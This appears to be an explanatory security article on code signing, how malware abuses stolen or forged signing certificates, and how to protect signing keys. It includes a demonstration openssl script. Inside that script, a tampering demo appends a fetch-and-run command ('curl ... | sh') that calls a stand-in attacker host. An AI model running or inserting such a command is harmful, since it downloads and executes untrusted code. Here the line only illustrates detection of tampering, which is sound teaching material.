Digital certificates and malware go together like peanut butter and petroleum jelly -- they can be sandwiched together easily, but the result is not exactly tasty or good for you.
As you may know, digital certificates are used to cryptographically sign executable code and documents. If the digital certificate used to sign the content was issued by a certificate authority you or your computer trusts, the content is more likely to be accepted for execution or opening without warning messages.
The general process of code signing goes something like this:
1. The developer receives a code-signing digital certificate from a trusted certificate authority (CA).
a. The CA is supposed to verify the developer’s identity before issuing the digital certificate, thereby tying the digital certificate to the verified developer.
b. The code-signing certificate contains the public key of the developer, signed by the CA’s private key.
2. The developer creates content.
3. The developer signs the content.
a. The content is run through a cryptographic hash algorithm (SHA-256, for example) to produce a fixed-length hash.
b. The hash is then signed by the developer’s private key (related to the public key included in the developer’s code-signing certificate) to create a digital signature.
c. The digital signature is cryptographic proof of the content’s integrity as of the moment of signing; it says nothing about whether the content is safe.
4. The developer distributes signed content along with the code-signing digital certificate.
5. When a user or computer downloads the content, a program or a device checks the integrity of the content.
a. The content is rehashed using the hash algorithm recorded in the signature to get a newly obtained hash result.
b. The original signed hash is recovered from the signature using the developer’s public key included in the digital certificate.
c. The digital certificate itself is checked by verifying the CA’s signature on it with the public key of the trusted CA (usually already installed on the device or in the downloading program), and by confirming that the certificate is valid for code signing and has not expired or been revoked.
d. The original and newly obtained hash results are compared.
e. If the two hashes are identical, there is a high likelihood that the content has not been modified since the original signing.
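The steps above, run end to end with the openssl command-line tool, as an added example that is not part of the original article. The CA name, the developer name, the file names and the sample "installer" are all constructed for the demonstration; the verifier also shows the two failure modes the article goes on to discuss, content modified after signing and content signed with a certificate the recipient does not trust.

```shell
#!/bin/sh
# Added example: code signing and verification with the openssl CLI.
# Every name, key and file here is constructed for the demonstration.
set -eu

WORK=$(mktemp -d)
cd "$WORK"

# Minimal openssl config so the example does not depend on the system's default
# openssl.cnf. [ca_ext] marks the root as a CA; [cs_ext] restricts the
# developer's certificate to code signing.
cat > demo.cnf <<'EOF'
[req]
distinguished_name = dn
prompt = no
[dn]
CN = placeholder
[ca_ext]
basicConstraints = critical,CA:TRUE
keyUsage = critical,keyCertSign,cRLSign
subjectKeyIdentifier = hash
[cs_ext]
basicConstraints = critical,CA:FALSE
keyUsage = critical,digitalSignature
extendedKeyUsage = critical,codeSigning
EOF

# Step 1: the CA issues a code-signing certificate for the developer's key.
setup_pki() {
    # The CA's self-signed root: this is the certificate the recipient trusts.
    openssl req -x509 -newkey rsa:2048 -nodes -days 1 -config demo.cnf \
        -extensions ca_ext -subj "/CN=Example Trusted CA" \
        -keyout ca.key -out ca.crt 2>/dev/null
    # Step 1b: the developer's public key, signed by the CA's private key.
    openssl req -new -newkey rsa:2048 -nodes -config demo.cnf \
        -subj "/CN=Example Developer" -keyout dev.key -out dev.csr 2>/dev/null
    openssl x509 -req -days 1 -sha256 -in dev.csr -CA ca.crt -CAkey ca.key \
        -CAcreateserial -extfile demo.cnf -extensions cs_ext -out dev.crt 2>/dev/null
    # An attacker's self-signed certificate carrying the same name, but not
    # issued by the trusted CA.
    openssl req -x509 -newkey rsa:2048 -nodes -days 1 -config demo.cnf \
        -subj "/CN=Example Developer" -keyout evil.key -out evil.crt 2>/dev/null
}

# Steps 3a-3b: hash the content with SHA-256 and sign the hash with the
# private key. The signature file travels with the content and the
# certificate (step 4).
sign() {  # sign <private-key> <content> <signature-out>
    openssl dgst -sha256 -sign "$1" -out "$3" "$2"
}

# Step 5: what the recipient checks. Prints the outcome and returns 0 only if
# the chain, the certificate's permitted use and the signature all check out.
verify() {  # verify <trusted-ca-cert> <signer-cert> <content> <signature>
    ca=$1 cert=$2 content=$3 sig=$4
    # 5c: the signer's certificate must chain to a CA we already trust.
    if ! openssl verify -CAfile "$ca" "$cert" >/dev/null 2>&1; then
        echo "REJECT: certificate not issued by a trusted CA"; return 1
    fi
    # A valid chain is not enough: the certificate must be allowed to sign code.
    if ! openssl x509 -in "$cert" -noout -text | grep -q 'Code Signing'; then
        echo "REJECT: certificate not valid for code signing"; return 1
    fi
    # 5a/5b/5d: rehash the content and compare with the signed hash, using the
    # public key carried in the certificate.
    openssl x509 -in "$cert" -pubkey -noout > signer.pub
    if ! openssl dgst -sha256 -verify signer.pub -signature "$sig" "$content" >/dev/null 2>&1; then
        echo "REJECT: content hash does not match the signed hash"; return 1
    fi
    echo "ACCEPT: signature valid and signer trusted"
}

demo() {
    setup_pki
    printf 'echo "installing the genuine product"\n' > installer.sh  # constructed content
    sign dev.key installer.sh installer.sig
    verify ca.crt dev.crt installer.sh installer.sig                  # ACCEPT
    # Tampering after signing: the rehash no longer matches (step 5e fails).
    printf 'curl -s http://attacker.invalid/x | sh\n' >> installer.sh
    verify ca.crt dev.crt installer.sh installer.sig || true          # REJECT: hash mismatch
    # Re-signing with an untrusted key: the signature verifies, the chain does not.
    sign evil.key installer.sh evil.sig
    verify ca.crt evil.crt installer.sh evil.sig || true              # REJECT: untrusted CA
}
demo
```

Note that the chain check and the "Code Signing" check are what stand between the recipient and an attacker who simply generates a certificate with the victim's name; the hash comparison alone cannot tell the two apart. Real verifiers (Authenticode, Gatekeeper, package managers) add revocation and expiry checks that this example omits.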
That’s the way it’s supposed to work. The idea is that if you come across signed code, particularly code signed with a digital certificate from a legitimate CA, you should be able to trust it. Unfortunately, that fragile and often mysterious trust is broken so frequently that some people wonder whether code signing has any value.
Why malware uses digital certificates
This is a no-brainer: Malware is often signed by trusted code-signing certificates to make you or your computing device accept malicious Trojan code as legitimate.
Sometimes the malware writers use their own, nontrusted code-signing certificates, but more often they use code-signing certificates from other legitimate vendors. The number of legitimate vendors who have had their code-signing certificates stolen reads like a who’s who of the computer world. It includes big names who make the world’s most popular software.
Once a legitimate code-signing certificate is stolen, it can be difficult to revoke even after the theft has been discovered. That’s because revoking the compromised certificate means all the legitimate software signed with it will no longer be accepted as legitimate, either. (On Windows, signatures countersigned by a trusted timestamp server before the revocation’s effective date can stay valid, but only if the vendor timestamped them in the first place.) One malware program signed by one stolen digital certificate may end up invalidating dozens to hundreds of pieces of legitimate code.
Of course, that’s only when revocation works -- often, it doesn’t.
How malware creators snag trusted digital certificates
Malware creators break into software companies wielding the same techniques they use against any company: social engineering, Trojans, unpatched software, and so on. Sometimes hackers break in with the intent to steal the victim’s code-signing certificates; other times they stumble across them and recognize their value. Malware developers pay handsomely for popular vendors’ code-signing certificates.
For example, the world’s most sophisticated malware program, Stuxnet, was signed by digital certificates stolen from two popular Taiwanese companies. Over the last decade, several cyber gangs dedicated to stealing trusted signing keys have emerged. They are prolific and successful at what they do.
Dozens of malware programs include digital certificate stealing routines in their bag of tricks. A 2013 Symantec report did a great job detailing a number of these tools.
In a few cases, weaknesses in the cryptography behind a certificate allowed a determined adversary to forge a trusted signature without ever obtaining the private key. For example, in 2012 the sophisticated Flame malware used an MD5 chosen-prefix collision attack against a Microsoft certificate chain (the Terminal Server Licensing Service, which was still issuing certificates signed with the long-broken MD5 hash) to mint a forged certificate that Windows accepted as if Microsoft had signed the code. No private key was stolen; the hash algorithm was simply too weak to prevent an attacker from constructing a second certificate that carried the same signature.
How many malware programs have digital certificates?
I don’t have the latest statistics, but it might not be a stretch to say there are more malware programs with trusted digital signatures than not. McAfee warned that more than 1.5 million newly signed malicious binaries appeared in a single quarter -- in 2013. It’s much worse now. Kaspersky has said that digitally signed malware has risen steadily since 2008.
An article by Lucian Constantin of IDG News Service tells the story of multiple digital certificates stolen in 2015. Plus, check out this website dedicated to listing all digital certificates used by malware programs.
How to protect your code-signing certificates
For three decades, whenever I installed a company's new Public Key Infrastructure (PKI), I warned them to protect their PKI servers as if they were the most valuable assets in the firm. For the first two decades I said this because of the theoretical threat, though I knew hackers were not really targeting PKIs or digital certificates -- yet.
Now they are. Over the last decade, hackers and malware have been in hot pursuit of your PKIs and digital certificates, especially your code-signing certificates. Here’s what you can do to protect yourself:
- Be sure to use a hardware security module (HSM) for all your PKI CAs and for code signing. To date, no private key has ever been stolen in an unencrypted state from an HSM -- at least no one has publicly acknowledged it.
- All PKI and code-signing servers and computers should have the strongest security settings and configurations available.
- All code signing should be done from dedicated computers not connected to any network.
- Make sure all users understand that a valid, trusted digital certificate doesn’t mean the program they might be tempted to install, execute, or open is harmless. Share this article and educate them.
Malware has so successfully abused the trusted digital signature paradigm that it makes you question the value of the digital signature process in general. Yes, there’s still value, along with issues and cracks. They could be fixed if more code signers used the protections outlined here.